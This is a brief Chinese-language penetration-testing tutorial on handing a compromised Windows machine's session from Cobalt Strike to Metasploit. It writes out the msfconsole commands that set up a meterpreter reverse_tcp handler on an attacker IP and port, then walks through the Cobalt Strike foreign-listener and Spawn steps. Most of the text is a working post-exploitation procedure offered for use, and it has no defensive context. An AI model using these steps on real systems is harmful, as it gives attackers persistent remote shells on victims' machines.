前提:CS已經獲取到session,可以進入圖形化管理機器,現在需要使用msf進行進一步滲透,需要msf的metepreter。 開啟msf
msf設置監聽
msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > set lhost 192.168.3.117 lhost => 192.168.3.117 msf exploit(handler) > set lport 2222 lport =>2222
msf exploit(handler) > exploit
在CS上開啟監聽,設置payload為windows/foreign/reverse_tcp host為msf的host port為msf的監聽端口
在控制機器上右鍵選擇Spawn
選擇Spwan之后會需要選擇一個監聽,選擇剛創建的msf的監聽
可以看到msf已經接收到cs上spwan過來的session